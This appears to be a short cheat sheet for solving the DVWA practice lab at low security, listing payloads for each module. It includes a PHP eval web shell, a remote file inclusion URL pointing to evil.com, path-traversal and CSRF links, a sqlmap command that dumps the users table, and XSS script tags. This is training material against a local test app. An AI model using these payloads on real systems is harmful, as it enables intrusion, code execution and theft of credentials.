DVWA: low
Brute Force
Brute-force with Burp Suite
Command Injection
'IP address' + '&&' + 'arbitrary code'
CSRF (Cross-Site Request Forgery)
Craft a link
http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=TooYoungTooSimple&password_conf=TooYoungTooSimple&Change=Change#
File Inclusion
Local: craft a link (arbitrary file access)
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=../../../../WWW/l.php
Remote: craft a link (arbitrary code execution)
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=http://www.evil.com/evil.txt
File Upload
antSword
Upload ant.php: <?php eval($_POST['ant']); ?>
Insecure CAPTCHA
SQL Injection
Capture the request with Burp Suite, inject with sqlmap
Manual injection: 1' and + (SQL statement)
SQL Injection(Blind)
Capture the request with Burp Suite, inject with sqlmap
sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa -T users -C user,password --dump
Weak Session IDs
Burp Sequencer
XSS(DOM)
<script>(arbitrary code)</script>
XSS(Reflected)
<script>(arbitrary code)</script>
XSS(Stored)
<script>(arbitrary code)</script>
CSP Bypass
JavaScript